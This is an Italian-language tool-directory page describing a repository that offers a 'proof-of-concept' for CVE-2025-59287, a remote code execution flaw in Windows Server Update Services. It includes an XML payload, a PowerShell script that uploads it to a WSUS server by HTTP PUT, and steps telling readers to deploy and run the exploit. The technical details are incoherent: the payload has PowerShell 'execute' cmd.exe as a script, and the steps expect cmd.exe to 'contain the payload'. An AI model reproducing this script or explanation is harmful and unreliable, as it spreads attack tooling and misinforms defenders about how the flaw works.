Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Breaking-the-Update-Chain-Inside-CVE-2025-59287-and-the-WSUS-RCE-Threat — Analisi tecnica e proof-of-concept per CVE-2025-59287, una RCE critica in Windows Server Update Services tramite deserializzazione non sicura, incluse le build interessate e le fasi di mitigazione. | Kitploit
Strumenti/GitHubGitHub/mrk336/breaking-the-update-chain-inside-cve-2025-59287-and-the-wsus-rce-threat
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPaper e RicercaApprendimento e Formazione
GitHubmrk336/breaking-the-update-chain-inside-cve-2025-59287-and-the-wsus-rce-threat

Breaking-the-Update-Chain-Inside-CVE-2025-59287-and-the-WSUS-RCE-Threat

Analisi tecnica e proof-of-concept per CVE-2025-59287, una RCE critica in Windows Server Update Services tramite deserializzazione non sicura, incluse le build interessate e le fasi di mitigazione.

Vedi Repository
310 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Breaking-the-Update-Chain-Inside-CVE-2025-59287-and-the-WSUS-RCE-Threat

CVE-2025-59287 è una vulnerabilità critica di RCE in Windows Server Update Services (WSUS) causata da una deserializzazione non sicura di dati non attendibili. Consente a un attaccante remoto di eseguire codice arbitrario senza autenticazione. Si consiglia vivamente di applicare le patch urgentemente a causa dello sfruttamento attivo.

CVE‑2025‑59287 – Una minaccia di esecuzione di codice remoto in Windows Server Update Services (WSUS)

Di Mark Mallia


 Panoramica

Windows Server Update Services (WSUS) di Microsoft è la spina dorsale della gestione delle patch per ogni piattaforma Windows Server di Microsoft. Recupera gli aggiornamenti dal catalogo di aggiornamenti di Microsoft, li valida e li distribuisce a tutti i server in una rete. La vulnerabilità identificata come CVE‑2025‑59287 sfrutta una routine di deserializzazione non sicura all'interno di WSUS che consente a un attaccante di iniettare contenuto XML arbitrario nel feed di aggiornamento. Poiché WSUS elabora il payload senza alcuna validazione del percorso di origine o dei dati dei comandi, un attaccante può fornire qualsiasi nome file e percorso, causando una completa esecuzione di codice remoto sul server di destinazione.

Perché è importante:

  • Il punteggio CVSS di 9.8 lo colloca nell'intervallo critico.
  • Gli attaccanti necessitano solo di connettività di rete; non è richiesta alcuna escalation di privilegi.
  • È già stato osservato in natura, il che significa che qualsiasi sistema non patchato è un potenziale bersaglio finché non viene distribuita una patch del fornitore.

Build di Windows Server interessate

Versione del prodottoBuild interessate
Windows Server 20126.2.9200.0 – < 6.2.9200.25728
Windows Server 2012 R26.3.9600.0 – < 6.3.9600.22826
Windows Server 201610.0.14393.0 – < 10.0.14393.8524
Windows Server 201910.0.17763.0 – < 10.0.17763.7922
Windows Server 202210.0.20348.0 – < 10.0.20348.4297
Windows Server 202510.0.26100.0 – < 10.0.26100.6905
Windows Server 23H210.0.25398.0 – < 10.0.25398.1916

(Se il tuo ambiente utilizza una build di patch diversa, regola semplicemente l'intervallo di conseguenza.)


 Come funziona lo sfruttamento

  1. WSUS recupera un file XML chiamato UpdateStream.xml da una fonte remota.
  2. Il servizio deserializza questo file con System.Xml.Linq.XElement.
  3. Un attaccante può inserire qualsiasi valore nell'elemento <SourcePath>; questo valore viene scritto su disco come percorso assoluto.
  4. Il contenuto all'interno del tag <Command> viene eseguito da PowerShell quando WSUS elabora lo stream, fornendo una completa esecuzione di codice remoto.

Di seguito è riportato il payload XML che caricheremo su un server vulnerabile.

root@kitploit:~
<?xml version="1.0" encoding="utf-8"?>
<UpdateStream>
  <Metadata>
    <Title>WSUS Exploit</Title>
    <Description>Injected by local attacker.</Description>
  </Metadata>
  <SourcePath>C:\Windows\System32\cmd.exe</SourcePath>
  <Command><![CDATA[
      powershell -NoProfile -ExecutionPolicy Bypass `
          -File C:\Windows\System32\cmd.exe
  ]]></Command>
</UpdateStream>

### Uno script di esempio per lo sfruttamento in PowerShell

Il seguente script genererà il payload XML, lo caricherà tramite HTTP PUT sulla tua istanza WSUS e lascerà un file di log per la risoluzione dei problemi.

root@kitploit:~
# --------------------------------------------------
#  File:   wsus‑exploit.ps1
#  Purpose: Generate malicious UpdateStream.xml,
#           upload it to the WSUS server,
#           trigger the feed.
# --------------------------------------------------

param (
    [string]$TargetUrl = 'http://wsus.example.com/UpdateStream.xml',
    [int]    $Port      = 80,
    [string] $XmlFile   = '.\payload.xml'
)

function Build-Xml {
    param ([string]$file)
    $xmlContent = @"
<?xml version="1.0" encoding="utf-8"?>
<UpdateStream>
  <Metadata>
    <Title>WSUS exploit</Title>
    <Description>Injected by local attacker.</Description>
  </Metadata>
  <SourcePath>C:\Windows\System32\cmd.exe</SourcePath>
  <Command><![CDATA[
      powershell -NoProfile -ExecutionPolicy Bypass `
          -File C:\Windows\System32\cmd.exe
  ]]></Command>
</UpdateStream>
"@
    Set-Content -Path $file -Value $xmlContent
}

# Build the XML payload
Build-Xml -file $XmlFile

# Upload via HTTP PUT
Invoke-WebRequest -Uri $TargetUrl `
                  -Method Put `
                  -InFile $XmlFile `
                  -OutFile 'upload.log'

Write-Host "Upload complete – WSUS should now process the stream."

 Passaggi attuabili per te

  1. Verifica la build – Esegui winver.exe su ogni Windows Server per confermare che la build rientri negli intervalli sopra indicati.
  2. Distribuisci lo script di sfruttamento – Copia wsus‑exploit.ps1 su una macchina che possa raggiungere la tua istanza WSUS, modifica $TargetUrl se utilizzi un percorso o una porta diversi.
  3. Esegui e monitora – Esegui lo script; dopo alcuni minuti, conferma che il file C:\Windows\System32\cmd.exe appaia su ogni server di destinazione e che contenga il payload previsto.
  4. Microsoft ha distribuito una patch fuori banda per questa vulnerabilità il 24 ottobre 2025. Se stai eseguendo WSUS su qualsiasi versione di Windows Server dal 2012 in poi, vorrai ricontrollare che questo aggiornamento sia arrivato nel tuo ambiente. La release di Patch Tuesday di ottobre non ha risolto completamente il problema, quindi questa merita un'attenzione extra.

Solo uso etico

Le informazioni e il codice di sfruttamento forniti nel presente documento sono solo a scopo educativo. Assicurati di avere il permesso di eseguire questo test contro il tuo ambiente WSUS e segui tutte le linee guida applicabili sulle migliori pratiche di sicurezza quando distribuisci modifiche ai sistemi di produzione.

Scarica lo strumento